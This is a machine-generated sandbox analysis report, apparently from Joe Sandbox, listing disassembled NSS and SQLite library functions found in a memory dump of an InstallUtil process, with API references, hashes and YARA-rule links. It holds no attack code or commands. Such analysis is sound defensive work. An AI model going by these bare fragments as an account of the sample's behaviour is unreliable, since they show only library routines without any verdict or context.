                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$K11_$Alloc_ArenaArena_DoesFindMechanismTag_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2003479236-0
                                                                                                                  • Opcode ID: 23e773cf1430b448038cb5704f69fb380029e02cc391f3ea17a25ad626348aa6
                                                                                                                  • Instruction ID: 0b935b823f0456598ce27338a76b6157c8674b49689ef20d2a8832e757fc16f5
                                                                                                                  • Opcode Fuzzy Hash: 23e773cf1430b448038cb5704f69fb380029e02cc391f3ea17a25ad626348aa6
                                                                                                                  • Instruction Fuzzy Hash: CFE0B6B0D08B489BD708DF6AD54506AFBE4AFD8214F00D91DFC9C57212F730A5D48B82
                                                                                                                  Function 6C826E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C6DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C73F9C9,?,6C73F4DA,6C73F9C9,?,?,6C70369A), ref: 6C6DCA7A
                                                                                                                    • Part of subcall function 6C6DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6DCB26
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?,6C6EBE66), ref: 6C826E81
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C6EBE66), ref: 6C826E98
                                                                                                                  • sqlite3_snprintf.NSS3(?,00000000,6C88AAF9,?,?,?,?,?,?,6C6EBE66), ref: 6C826EC9
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C6EBE66), ref: 6C826ED2
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C6EBE66), ref: 6C826EF8
                                                                                                                  • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826F1F
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826F28
                                                                                                                  • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826F3D
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C6EBE66), ref: 6C826FA6
                                                                                                                  • sqlite3_snprintf.NSS3(?,00000000,6C88AAF9,00000000,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826FDB
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826FE4
                                                                                                                  • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826FEF
                                                                                                                  • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C827014
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,6C6EBE66), ref: 6C82701D
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C6EBE66), ref: 6C827030
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C6EBE66), ref: 6C82705B
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C6EBE66), ref: 6C827079
                                                                                                                  • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C827097
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C8270A0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                  • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                  • API String ID: 593473924-707647140
                                                                                                                  • Opcode ID: 0539ceda50f2c50e3d43a0412d58b98c323dfe7f87323349ec60f0383bf76509
                                                                                                                  • Instruction ID: f3c8a002a31eaa7a800b3a756280481e2969488f0307fcdb5bb855e7b2fc42db
                                                                                                                  • Opcode Fuzzy Hash: 0539ceda50f2c50e3d43a0412d58b98c323dfe7f87323349ec60f0383bf76509
                                                                                                                  • Instruction Fuzzy Hash: 525179B1A041116BE73096359D69FBB36669F8330CF144D38E801DAFC1FF29A54E82D6
                                                                                                                  Function 6C7B4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7675C2,00000000,00000000,00000001), ref: 6C7B5009
                                                                                                                  • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7675C2,00000000), ref: 6C7B5049
                                                                                                                  • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7B505D
                                                                                                                  • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C7B5071
                                                                                                                  • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B5089
                                                                                                                  • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B50A1
                                                                                                                  • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C7B50B2
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7675C2), ref: 6C7B50CB
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7B50D9
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7B50F5
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B5103
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B511D
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B512B
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B5145
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B5153
                                                                                                                  • free.MOZGLUE(?), ref: 6C7B516D
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C7B517B
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7B5195
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                                  • String ID: config=$library=$name=$nss=$parameters=
                                                                                                                  • API String ID: 391827415-203331871
                                                                                                                  • Opcode ID: 760f2446860dee7a5730141639a79c82270c37eb83620e4a49edafb9538a99bb
                                                                                                                  • Instruction ID: 78e9cac7ec3edcbaa81c1dab902ef96ec54e95040d4de6c3452f4a4d49412cd0
                                                                                                                  • Opcode Fuzzy Hash: 760f2446860dee7a5730141639a79c82270c37eb83620e4a49edafb9538a99bb
                                                                                                                  • Instruction Fuzzy Hash: 5751A7B5A0110A6BEB91DF64EE45AAE37A8AF05248F140430FC19F7741EB35E915C7F2
                                                                                                                  Function 6C7B4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4C50
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4C5B
                                                                                                                  • PR_smprintf.NSS3(6C88AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4C76
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4CAE
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B4CC9
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B4CF4
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B4D0B
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4D5E
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4D68
                                                                                                                  • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C7B4D85
                                                                                                                  • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C7B4DA2
                                                                                                                  • free.MOZGLUE(?), ref: 6C7B4DB9
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B4DCF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                  • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                  • API String ID: 3756394533-2552752316
                                                                                                                  • Opcode ID: 1da9c00f0bf71b9fccd3b2b33255ac9c1a246526d7f7e4e041e4e6520fb30350
                                                                                                                  • Instruction ID: 41a2bd85fac771b764ea5dc01e80852d2ee9e645383c4beab7ce67bfdc0ce928
                                                                                                                  • Opcode Fuzzy Hash: 1da9c00f0bf71b9fccd3b2b33255ac9c1a246526d7f7e4e041e4e6520fb30350
                                                                                                                  • Instruction Fuzzy Hash: 7D419EF29001416BDB219F689E496BF3675AF8270CF544534EC1A6BB02E731E814D7D3
                                                                                                                  Function 6C796CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C796943
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C796957
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C796972
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C796983
                                                                                                                    • Part of subcall function 6C796910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7969AA
                                                                                                                    • Part of subcall function 6C796910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7969BE
                                                                                                                    • Part of subcall function 6C796910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7969D2
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7969DF
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C796A5B
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C796D8C
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C796DC5
                                                                                                                  • free.MOZGLUE(?), ref: 6C796DD6
                                                                                                                  • free.MOZGLUE(?), ref: 6C796DE7
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C796E1F
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C796E4B
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C796E72
                                                                                                                  • free.MOZGLUE(?), ref: 6C796EA7
                                                                                                                  • free.MOZGLUE(?), ref: 6C796EC4
                                                                                                                  • free.MOZGLUE(?), ref: 6C796ED5
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C796EE3
                                                                                                                  • free.MOZGLUE(?), ref: 6C796EF4
                                                                                                                  • free.MOZGLUE(?), ref: 6C796F08
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C796F35
                                                                                                                  • free.MOZGLUE(?), ref: 6C796F44
                                                                                                                  • free.MOZGLUE(?), ref: 6C796F5B
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C796F65
                                                                                                                    • Part of subcall function 6C796C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C79781D,00000000,6C78BE2C,?,6C796B1D,?,?,?,?,00000000,00000000,6C79781D), ref: 6C796C40
                                                                                                                    • Part of subcall function 6C796C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C79781D,?,6C78BE2C,?), ref: 6C796C58
                                                                                                                    • Part of subcall function 6C796C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C79781D), ref: 6C796C6F
                                                                                                                    • Part of subcall function 6C796C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C796C84
                                                                                                                    • Part of subcall function 6C796C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C796C96
                                                                                                                    • Part of subcall function 6C796C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C796CAA
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C796F90
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C796FC5
                                                                                                                  • PK11_GetInternalKeySlot.NSS3 ref: 6C796FF4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                  • String ID: +`zl
                                                                                                                  • API String ID: 1304971872-2406776844
                                                                                                                  • Opcode ID: bbb21de6d5295fbe7df6346772a9ad2ec6c5bfcfa6a3c25f392cfaf67bb67779
                                                                                                                  • Instruction ID: 38cb24ffd007dac53c45ee74186bf5e47885d3245cec7e08f2dacbde4af6b658
                                                                                                                  • Opcode Fuzzy Hash: bbb21de6d5295fbe7df6346772a9ad2ec6c5bfcfa6a3c25f392cfaf67bb67779
                                                                                                                  • Instruction Fuzzy Hash: 90B173B0E012099FDF90DBA5EA45B9EBBB9BF05348F140235E815E7641E731EA14CBE1
                                                                                                                  Function 6C7808F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C78094D
                                                                                                                  • htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C780953
                                                                                                                  • htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C78096E
                                                                                                                  • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C780974
                                                                                                                  • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C78098F
                                                                                                                  • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C780995
                                                                                                                    • Part of subcall function 6C781800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C781860
                                                                                                                    • Part of subcall function 6C781800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C7809BF), ref: 6C781897
                                                                                                                    • Part of subcall function 6C781800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7818AA
                                                                                                                    • Part of subcall function 6C781800: memcpy.VCRUNTIME140(?,?,?), ref: 6C7818C4
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C780B4F
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C780B5E
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C780B6B
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C780B78
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
                                                                                                                  • String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
                                                                                                                  • API String ID: 1637529542-763765719
                                                                                                                  • Opcode ID: f5d4ef76adbe8f066c2e08f88fda0067ecadd2fc13e50d1582a1162344cb6e81
                                                                                                                  • Instruction ID: 0bf44ac7b292f05704d6e1008290e895f0e4c1ec3ab2a7d978a3c73f83a43e21
                                                                                                                  • Opcode Fuzzy Hash: f5d4ef76adbe8f066c2e08f88fda0067ecadd2fc13e50d1582a1162344cb6e81
                                                                                                                  • Instruction Fuzzy Hash: E4818B75605305AFC710CF55CD8499AFBE8FF8D608F048929FA9887B51E730EA19CB92
                                                                                                                  Function 6C792D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C792DEC
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C792E00
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C792E2B
                                                                                                                  • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C792E43
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C764F1C,?,-00000001,00000000,?), ref: 6C792E74
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C764F1C,?,-00000001,00000000), ref: 6C792E88
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C792EC6
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C792EE4
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C792EF8
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C792F62
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C792F86
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C792F9E
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C792FCA
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79301A
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C79302E
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C793066
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C793085
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7930EC
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79310C
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C793124
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79314C
                                                                                                                    • Part of subcall function 6C779180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C7A379E,?,6C779568,00000000,?,6C7A379E,?,00000001,?), ref: 6C77918D
                                                                                                                    • Part of subcall function 6C779180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C7A379E,?,6C779568,00000000,?,6C7A379E,?,00000001,?), ref: 6C7791A0
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C79316D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3383223490-0
                                                                                                                  • Opcode ID: 902a5a76a77e363bb4ae607723a990beb6675d8be71a21e749029db891e02fdb
                                                                                                                  • Instruction ID: 4fdcd52b7331ea1c729270d282cb5c2047688ab2ad3dd2ff2e5544445fd31555
                                                                                                                  • Opcode Fuzzy Hash: 902a5a76a77e363bb4ae607723a990beb6675d8be71a21e749029db891e02fdb
                                                                                                                  • Instruction Fuzzy Hash: F9F1AEB1D00609AFDF10EF68E989B9DBBB5BF09318F144165EC04A7721E731E895CB91
                                                                                                                  Function 6C7925D0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 284COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?,?), ref: 6C79264E
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?,?), ref: 6C792670
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?), ref: 6C792684
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7926C2
